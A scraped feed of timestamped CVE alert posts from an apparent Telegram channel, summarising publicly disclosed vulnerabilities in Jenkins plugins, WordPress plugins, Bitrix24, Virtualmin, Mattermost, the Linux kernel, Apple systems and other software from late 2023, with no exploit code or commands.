🚨 CVE-2023-5875Mattermost Desktop fails to correctly handle permissions or prompt the user for consent on certain sensitive ones allowing media exploitation from a malicious mattermost server🎖@cveNotify |
|
| 2023-11-02 10:52:09 |
🚨 CVE-2023-5876Mattermost fails to properly validate a RegExp built off the server URL path, allowing an attacker in control of an enrolled server to mount a Denial Of Service.🎖@cveNotify |
|
| 2023-11-02 10:52:07 |
🚨 CVE-2023-5920Mattermost Desktop for MacOS fails to utilize the secure keyboard input functionality provided by macOS, allowing for other processes to read the keyboard input.🎖@cveNotify |
|
| 2023-11-02 10:52:05 |
🚨 CVE-2023-46595Net-NTLM leak in Fireflow A32.20 and A32.50 allows an attacker to obtain victim’s domain credentials and Net-NTLM hash which can lead to relay domain attacks.🎖@cveNotify |
|
| 2023-11-02 10:52:04 |
🚨 CVE-2023-46695An issue was discovered in Django 3.2 before 3.2.23, 4.1 before 4.1.13, and 4.2 before 4.2.7. The NFKC normalization is slow on Windows. As a consequence, django.contrib.auth.forms.UsernameField is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.🎖@cveNotify |
|
| 2023-11-02 10:52:03 |
🚨 CVE-2023-47204Unsafe YAML deserialization in yaml.Loader in transmute-core before 1.13.5 allows attackers to execute arbitrary Python code.🎖@cveNotify |
|
| 2023-11-02 06:22:20 |
🚨 CVE-2022-2541The uContext for Amazon plugin for WordPress is vulnerable to Cross-Site Request Forgery to Cross-Site Scripting in versions up to, and including 3.9.1. This is due to missing nonce validation in the ~/app/sites/ajax/actions/keyword_save.php file that is called via the doAjax() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-11-02 06:22:19 |
🚨 CVE-2023-4147A use-after-free flaw was found in the Linux kernel’s Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system.🎖@cveNotify |
|
| 2023-11-02 06:22:18 |
🚨 CVE-2022-2943The WordPress Infinite Scroll – Ajax Load More plugin for Wordpress is vulnerable to arbitrary file reading in versions up to, and including, 5.5.3 due to insufficient file path validation on the alm_repeaters_export() function. This makes it possible for authenticated attackers, with administrative privileges, to download arbitrary files hosted on the server that may contain sensitive content, such as the wp-config.php file.🎖@cveNotify |
|
| 2023-11-02 06:22:16 |
🚨 CVE-2023-45111Online Examination System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'email' parameter of the feed.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-11-02 06:22:15 |
🚨 CVE-2023-45112Online Examination System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'feedback' parameter of the feed.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-11-02 06:22:14 |
🚨 CVE-2023-45113Online Examination System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'name' parameter of the feed.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-11-02 06:22:13 |
🚨 CVE-2023-45114Online Examination System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'subject' parameter of the feed.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-11-02 06:22:11 |
🚨 CVE-2022-2941The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the "Naming Conventions" section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-11-02 06:22:10 |
🚨 CVE-2023-42755A flaw was found in the IPv4 Resource Reservation Protocol (RSVP) classifier in the Linux kernel. The xprt pointer may go beyond the linear part of the skb, leading to an out-of-bounds read in the `rsvp_classify` function. This issue may allow a local user to crash the system and cause a denial of service.🎖@cveNotify |
|
| 2023-11-02 06:22:09 |
🚨 CVE-2023-36417Microsoft SQL OLE DB Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-11-02 06:22:08 |
🚨 CVE-2023-21739Windows Bluetooth Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-01 22:22:25 |
🚨 CVE-2022-43409Jenkins Pipeline: Supporting APIs Plugin 838.va_3a_087b_4055b and earlier does not sanitize or properly encode URLs of hyperlinks sending POST requests in build logs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create Pipelines.🎖@cveNotify |
|
| 2023-11-01 22:22:24 |
🚨 CVE-2022-43410Jenkins Mercurial Plugin 1251.va_b_121f184902 and earlier provides information about which jobs were triggered or scheduled for polling through its webhook endpoint, including jobs the user has no permission to access.🎖@cveNotify |
|
| 2023-11-01 22:22:23 |
🚨 CVE-2022-43408Jenkins Pipeline: Stage View Plugin 2.26 and earlier does not correctly encode the ID of 'input' steps when using it to generate URLs to proceed or abort Pipeline builds, allowing attackers able to configure Pipelines to specify 'input' step IDs resulting in URLs that would bypass the CSRF protection of any target URL in Jenkins.🎖@cveNotify |
|
| 2023-11-01 22:22:22 |
🚨 CVE-2022-43411Jenkins GitLab Plugin 1.5.35 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.🎖@cveNotify |
|
| 2023-11-01 22:22:21 |
🚨 CVE-2022-43407Jenkins Pipeline: Input Step Plugin 451.vf1a_a_4f405289 and earlier does not restrict or sanitize the optionally specified ID of the 'input' step, which is used for the URLs that process user interactions for the given 'input' step (proceed or abort) and is not correctly encoded, allowing attackers able to configure Pipelines to have Jenkins build URLs from 'input' step IDs that would bypass the CSRF protection of any target URL in Jenkins when the 'input' step is interacted with.🎖@cveNotify |
|
| 2023-11-01 22:22:17 |
🚨 CVE-2023-5568A heap-based Buffer Overflow flaw was discovered in Samba. It could allow a remote, authenticated attacker to exploit this vulnerability to cause a denial of service.🎖@cveNotify |
|
| 2023-11-01 22:22:16 |
🚨 CVE-2022-43416Jenkins Katalon Plugin 1.0.32 and earlier implements an agent/controller message that does not limit where it can be executed and allows invoking Katalon with configurable arguments, allowing attackers able to control agent processes to invoke Katalon on the Jenkins controller with attacker-controlled version, install location, and arguments, and attackers additionally able to create files on the Jenkins controller (e.g., attackers with Item/Configure permission could archive artifacts) to invoke arbitrary OS commands.🎖@cveNotify |
|
| 2023-11-01 22:22:15 |
🚨 CVE-2022-43414Jenkins NUnit Plugin 0.27 and earlier implements an agent-to-controller message that parses files inside a user-specified directory as test results, allowing attackers able to control agent processes to obtain test results from files in an attacker-specified directory on the Jenkins controller.🎖@cveNotify |
|
| 2023-11-01 22:22:14 |
🚨 CVE-2022-43415Jenkins REPO Plugin 1.15.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-11-01 22:22:13 |
🚨 CVE-2022-43417Jenkins Katalon Plugin 1.0.32 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-01 22:22:09 |
🚨 CVE-2022-43418A cross-site request forgery (CSRF) vulnerability in Jenkins Katalon Plugin 1.0.33 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-01 22:22:07 |
🚨 CVE-2022-43413Jenkins Job Import Plugin 3.5 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-01 22:22:06 |
🚨 CVE-2022-41226Jenkins Compuware Common Configuration Plugin 1.0.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-11-01 22:22:05 |
🚨 CVE-2022-41227A cross-site request forgery (CSRF) vulnerability in Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.129 and earlier allows attackers to connect to an attacker-specified webserver using attacker-specified credentials.🎖@cveNotify |
|
| 2023-11-01 22:22:01 |
🚨 CVE-2022-41228A missing permission check in Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.129 and earlier allows attackers with Overall/Read permissions to connect to an attacker-specified webserver using attacker-specified credentials.🎖@cveNotify |
|
| 2023-11-01 22:22:00 |
🚨 CVE-2022-41229Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.134 and earlier does not escape configuration options of the Execute NetStorm/NetCloud Test build step, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-01 22:21:59 |
🚨 CVE-2022-41230Jenkins Build-Publisher Plugin 1.22 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to obtain names and URLs of Jenkins servers that the plugin is configured to publish builds to, as well as builds pending for publication to those Jenkins servers.🎖@cveNotify |
|
| 2023-11-01 22:21:58 |
🚨 CVE-2022-41231Jenkins Build-Publisher Plugin 1.22 and earlier allows attackers with Item/Configure permission to create or replace any config.xml file on the Jenkins controller file system by providing a crafted file name to an API endpoint.🎖@cveNotify |
|
| 2023-11-01 22:21:57 |
🚨 CVE-2022-41232A cross-site request forgery (CSRF) vulnerability in Jenkins Build-Publisher Plugin 1.22 and earlier allows attackers to replace any config.xml file on the Jenkins controller file system with an empty file by providing a crafted file name to an API endpoint.🎖@cveNotify |
|
| 2023-11-01 21:22:25 |
🚨 CVE-2023-46659Jenkins Edgewall Trac Plugin 1.13 and earlier does not escape the Trac website URL on the build page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-01 21:22:23 |
🚨 CVE-2023-5472Use after free in Profiles in Google Chrome prior to 118.0.5993.117 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-11-01 21:22:22 |
🚨 CVE-2023-46660Jenkins Zanata Plugin 0.6 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token hashes are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.🎖@cveNotify |
|
| 2023-11-01 21:22:21 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2023-11-01 21:22:20 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2023-11-01 21:22:19 |
🚨 CVE-2023-46358In the module "Referral and Affiliation Program" (referralbyphone) version 3.5.1 and before from Snegurka for PrestaShop, a guest can perform SQL injection. Method `ReferralByPhoneDefaultModuleFrontController::ajaxProcessCartRuleValidate` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.🎖@cveNotify |
|
| 2023-11-01 21:22:17 |
🚨 CVE-2023-5110The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'bsk-pdfm-category-dropdown' shortcode in versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-01 21:22:16 |
🚨 CVE-2023-5127The WP Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping on 'icon' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-01 21:22:15 |
🚨 CVE-2023-5311The WP EXtra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register() function in versions up to, and including, 6.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify the contents of the .htaccess files located in a site's root directory or /wp-content and /wp-includes folders and achieve remote code execution.🎖@cveNotify |
|
| 2023-11-01 21:22:14 |
🚨 CVE-2023-46650Jenkins GitHub Plugin 1.37.3 and earlier does not escape the GitHub project URL on the build page when showing changes, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-01 21:22:13 |
🚨 CVE-2023-46652A missing permission check in Jenkins lambdatest-automation Plugin 1.20.9 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of LAMBDATEST credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-01 21:22:12 |
🚨 CVE-2023-46651Jenkins Warnings Plugin 10.5.0 and earlier does not set the appropriate context for credentials lookup, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to. This fix has been backported to 10.4.1.🎖@cveNotify |
|
| 2023-11-01 21:22:11 |
🚨 CVE-2023-46653Jenkins lambdatest-automation Plugin 1.20.10 and earlier logs LAMBDATEST Credentials access token at the INFO level, potentially resulting in its exposure.🎖@cveNotify |
|
| 2023-11-01 20:00:06 |
https://t.me/malwr |
|
| 2023-11-01 19:21:57 |
🚨 CVE-2009-3560The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c, a different vulnerability than CVE-2009-2625 and CVE-2009-3720.🎖@cveNotify |
|
| 2023-11-01 14:51:59 |
🚨 CVE-2023-42489EisBaer Scada - CWE-732: Incorrect Permission Assignment for Critical Resource🎖@cveNotify |
|
| 2023-11-01 14:51:57 |
🚨 CVE-2023-42488EisBaer Scada - CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')🎖@cveNotify |
|
| 2023-11-01 12:22:20 |
🚨 CVE-2023-1715A logic error when using mb_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload.🎖@cveNotify |
|
| 2023-11-01 12:22:18 |
🚨 CVE-2023-1716Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.🎖@cveNotify |
|
| 2023-11-01 12:22:17 |
🚨 CVE-2023-1717Prototype pollution in bitrix/templates/bitrix24/components/bitrix/menu/left_vertical/script.js in Bitrix24 22.0.300 allows remote attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via polluting `__proto__[tag]` and `__proto__[text]`.🎖@cveNotify |
|
| 2023-11-01 12:22:16 |
🚨 CVE-2023-1718Improper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".🎖@cveNotify |
|
| 2023-11-01 12:22:15 |
🚨 CVE-2023-1719Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.🎖@cveNotify |
|
| 2023-11-01 12:22:13 |
🚨 CVE-2023-1720Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop_app/file.ajax.php?action=uploadfile.🎖@cveNotify |
|
| 2023-11-01 12:22:12 |
🚨 CVE-2023-42631In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:11 |
🚨 CVE-2023-42632In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:09 |
🚨 CVE-2023-42633In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:08 |
🚨 CVE-2023-42634In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:07 |
🚨 CVE-2023-42635In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:05 |
🚨 CVE-2023-42636In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:04 |
🚨 CVE-2023-42637In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:03 |
🚨 CVE-2023-42638In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:02 |
🚨 CVE-2023-42639In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:22:00 |
🚨 CVE-2023-42640In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:21:59 |
🚨 CVE-2023-42641In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:21:58 |
🚨 CVE-2023-42642In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:21:57 |
🚨 CVE-2023-42643In validationtools, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 12:21:56 |
🚨 CVE-2023-42644In dm service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-11-01 05:52:23 |
🚨 CVE-2023-5894Cross-site Scripting (XSS) - Stored in GitHub repository pkp/ojs prior to 3.3.0-16.🎖@cveNotify |
|
| 2023-11-01 05:52:21 |
🚨 CVE-2023-5895Cross-site Scripting (XSS) - DOM in GitHub repository pkp/pkp-lib prior to 3.3.0-16.🎖@cveNotify |
|
| 2023-11-01 05:52:20 |
🚨 CVE-2023-5896Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.4.0-4.🎖@cveNotify |
|
| 2023-11-01 05:52:18 |
🚨 CVE-2023-5897Cross-Site Request Forgery (CSRF) in GitHub repository pkp/customLocale prior to 1.2.0-1.🎖@cveNotify |
|
| 2023-11-01 05:52:17 |
🚨 CVE-2023-5898Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16.🎖@cveNotify |
|
| 2023-11-01 05:52:16 |
🚨 CVE-2023-5899Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16.🎖@cveNotify |
|
| 2023-11-01 05:52:14 |
🚨 CVE-2023-46278Uncontrolled resource consumption vulnerability in Cybozu Remote Service 4.1.0 to 4.1.1 allows a remote authenticated attacker to consume huge storage space or cause significantly delayed communication.🎖@cveNotify |
|
| 2023-11-01 05:52:12 |
🚨 CVE-2023-47094An issue was discovered in Virtualmin 7.7. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Account Plans tab of System Settings via the Plan Name field. Whenever the module is accessed, the XSS payload is executed.🎖@cveNotify |
|
| 2023-11-01 05:52:11 |
🚨 CVE-2023-47095An issue was discovered in Virtualmin 7.7. The Custom Fields feature of Edit Virtual Server under System Customization allows XSS.🎖@cveNotify |
|
| 2023-11-01 05:52:10 |
🚨 CVE-2023-47096An issue was discovered in Virtualmin 7.7. The Cloudmin Services Client under System Settings allows XSS.🎖@cveNotify |
|
| 2023-11-01 05:52:09 |
🚨 CVE-2023-47097An issue was discovered in Virtualmin 7.7. The Server Templates feature under System Settings allows XSS.🎖@cveNotify |
|
| 2023-11-01 05:52:08 |
🚨 CVE-2023-47098An issue was discovered in Virtualmin 7.7. A Stored Cross-Site Scripting (XSS) vulnerability exists in the Create Extra Administrator tab via the "Real name or description" field.🎖@cveNotify |
|
| 2023-11-01 05:52:07 |
🚨 CVE-2023-47099An issue was discovered in Virtualmin 7.7. The Create Virtual Server functionality allows XSS attacks against anyone who accesses the Virtual Server Summary tab.🎖@cveNotify |
|
| 2023-11-01 05:52:05 |
🚨 CVE-2023-40400This issue was addressed with improved checks. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. A remote user may cause an unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-11-01 05:52:04 |
🚨 CVE-2023-41995A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-11-01 05:52:03 |
🚨 CVE-2023-40442A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-11-01 05:52:02 |
🚨 CVE-2023-38605This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Ventura 13.5. An app may be able to determine a user’s current location.🎖@cveNotify |
|
| 2023-11-01 05:52:01 |
🚨 CVE-2023-40392A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.5. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-11-01 05:52:00 |
🚨 CVE-2022-3970A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt of the file libtiff/tif_getimage.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-01 05:51:59 |
🚨 CVE-2023-37833Improper access control in Elenos ETG150 FM transmitter v3.12 allows attackers to make arbitrary configuration edits that are only accessed by privileged users.🎖@cveNotify |
|
| 2023-10-31 22:52:28 |
🚨 CVE-2023-20886VMware Workspace ONE UEM console contains an open redirect vulnerability.A malicious actor may be able to redirect a victim to an attacker and retrieve their SAML response to login as the victim user.🎖@cveNotify |
|
| 2023-10-31 22:52:26 |
🚨 CVE-2023-39610An issue in TP-Link Tapo C100 v1.1.15 Build 211130 Rel.15378n(4555) and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted web request.🎖@cveNotify |
|
| 2023-10-31 22:52:23 |
🚨 CVE-2023-3676A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.🎖@cveNotify |
|
| 2023-10-31 22:52:21 |
🚨 CVE-2023-3955A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.🎖@cveNotify |
|
| 2023-10-31 22:52:18 |
🚨 CVE-2023-43295Cross Site Request Forgery vulnerability in Click Studios (SA) Pty Ltd Passwordstate v.Build 9785 and before allows a local attacker to execute arbitrary code via a crafted request.🎖@cveNotify |
|
| 2023-10-31 22:52:14 |
🚨 CVE-2023-46484An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.🎖@cveNotify |
|
| 2023-10-31 22:52:12 |
🚨 CVE-2023-46485An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.🎖@cveNotify |
|
| 2023-10-31 22:52:09 |
🚨 CVE-2023-45992A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before to could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system.🎖@cveNotify |
|
| 2023-10-31 22:52:07 |
🚨 CVE-2016-10893The crayon-syntax-highlighter plugin before 2.8.4 for WordPress has multiple XSS issues via AJAX requests.🎖@cveNotify |
|
| 2023-10-31 22:52:05 |
🚨 CVE-2023-41377In certain conditions for Calico Typha (v3.26.2, v3.25.1 and below), and Calico Enterprise Typha (v3.17.1, v3.16.3, v3.15.3 and below), a client TLS handshake can block the Calico Typha server indefinitely, resulting in denial of service. The TLS Handshake() call is performed inside the main server handle for loop without any timeout allowing an unclean TLS handshake to block the main loop indefinitely while other connections will be idle waiting for that handshake to finish.🎖@cveNotify |
|
| 2023-10-31 22:52:03 |
🚨 CVE-2023-44794An issue in Dromara SaToken version 1.36.0 and before allows a remote attacker to escalate privileges via a crafted payload to the URL.🎖@cveNotify |
|
| 2023-10-31 22:52:01 |
🚨 CVE-2023-41721Instances of UniFi Network Application that (i) are run on a UniFi Gateway Console, and (ii) are versions 7.5.176. and earlier, implement device adoption with improper access control logic, creating a risk of access to device configuration information by a malicious actor with preexisting access to the network.Affected Products:UDMUDM-PROUDM-SEUDRUDW Mitigation:Update UniFi Network to Version 7.5.187 or later.🎖@cveNotify |
|
| 2023-10-31 22:51:59 |
🚨 CVE-2023-43281Double Free vulnerability in Nothings Stb Image.h v.2.28 allows a remote attacker to cause a denial of service via a crafted file to the stbi_load_gif_main function.🎖@cveNotify |
|
| 2023-10-31 20:52:35 |
🚨 CVE-2023-37909XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting in version 5.1-rc-1 and prior to versions 14.10.8 and 15.3-rc-1, any user who can edit their own user profile can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This has been patched in XWiki 14.10.8 and 15.3-rc-1 by adding proper escaping. As a workaround, the patch can be manually applied to the document `Menu.UIExtensionSheet`; only three lines need to be changed.🎖@cveNotify |
|
| 2023-10-31 20:52:32 |
🚨 CVE-2023-26300A potential security vulnerability has been identified in the system BIOS for certain HP PC products which might allow escalation of privilege. HP is releasing firmware updates to mitigate the potential vulnerability.🎖@cveNotify |
|
| 2023-10-31 20:52:31 |
🚨 CVE-2022-25333The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) performs an RSA check implemented in mask ROM when loading a module through the SK_LOAD routine. However, only the module header authenticity is validated. An adversary can re-use any correctly signed header and append a forged payload, to be encrypted using the CEK (obtainable through CVE-2022-25332) in order to obtain arbitrary code execution in secure context. This constitutes a full break of the TEE security architecture.🎖@cveNotify |
|
| 2023-10-31 20:52:26 |
🚨 CVE-2022-25334The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) lacks a bounds check on the signature size field in the SK_LOAD module loading routine, present in mask ROM. A module with a sufficiently large signature field causes a stack overflow, affecting secure kernel data pages. This can be leveraged to obtain arbitrary code execution in secure supervisor context by overwriting a SHA256 function pointer in the secure kernel data area when loading a forged, unsigned SK_LOAD module encrypted with the CEK (obtainable through CVE-2022-25332). This constitutes a full break of the TEE security architecture.🎖@cveNotify |
|
| 2023-10-31 20:52:24 |
🚨 CVE-2023-45809Wagtail is an open source content management system built on Django. A user with a limited-permission editor account for the Wagtail admin can make a direct URL request to the admin view that handles bulk actions on user accounts. While authentication rules prevent the user from making any changes, the error message discloses the display names of user accounts, and by modifying URL parameters, the user can retrieve the display name for any user. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 4.1.8 (LTS), 5.0.5 and 5.1.3. The fix is also included in Release Candidate 1 of the forthcoming Wagtail 5.2 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-31 20:52:22 |
🚨 CVE-2023-30633An issue was discovered in TrEEConfigDriver in Insyde InsydeH2O with kernel 5.0 through 5.5. It can report false TPM PCR values, and thus mask malware activity. Devices use Platform Configuration Registers (PCRs) to record information about device and software configuration to ensure that the boot process is secure. (For example, Windows uses these PCR measurements to determine device health.) A vulnerable device can masquerade as a healthy device by extending arbitrary values into Platform Configuration Register (PCR) banks. This requires physical access to a target victim's device, or compromise of user credentials for a device. This issue is similar to CVE-2021-42299 (on Surface Pro devices).🎖@cveNotify |
|
| 2023-10-31 20:52:19 |
🚨 CVE-2023-37912XWiki Rendering is a generic Rendering system that converts textual input in a given syntax into another syntax. Prior to version 14.10.6 of `org.xwiki.platform:xwiki-core-rendering-macro-footnotes` and `org.xwiki.platform:xwiki-rendering-macro-footnotes` and prior to version 15.1-rc-1 of `org.xwiki.platform:xwiki-rendering-macro-footnotes`, the footnote macro executed its content in a potentially different context than the one in which it was defined. In particular in combination with the include macro, this allows privilege escalation from a simple user account in XWiki to programming rights and thus remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.6 and 15.1-rc-1. There is no workaround apart from upgrading to a fixed version of the footnote macro.🎖@cveNotify |
|
| 2023-10-31 20:52:16 |
🚨 CVE-2023-39735The leakage of the client secret in Uomasa_Saiji_news Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 20:52:14 |
